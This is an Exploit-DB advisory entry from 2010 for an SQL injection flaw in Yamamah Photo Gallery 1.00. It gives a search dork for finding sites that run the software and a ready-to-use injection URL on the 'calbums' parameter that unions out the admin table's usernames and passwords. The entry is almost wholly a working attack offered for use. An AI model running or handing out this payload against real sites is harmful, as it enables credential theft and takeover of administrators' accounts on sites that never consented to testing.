Yamamah Photo Gallery 1.00 SQL Injection Vulnerability calbums

2010-06-13T00:00:00
ID EDB-ID:13857
Type exploitdb
Reporter CoBRa_21
Modified 2010-06-13T00:00:00

Description

Yamamah Photo Gallery 1.00 SQL Injection Vulnerability (calbums). Webapps exploit for php platform

                                        
                                            ##################################################################################################

Yamamah Photo Gallery 1.00 SQL Injection Vulnerability

##################################################################################################

Author : CoBRa_21

Script Home : http://www.yamamah.org/

Dork : "Powered By : Yamamah Version 1.00"

##################################################################################################

SQL Injection:

http://localhost/[path]/?calbums=-2 union select 0,1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13 from admin--

##################################################################################################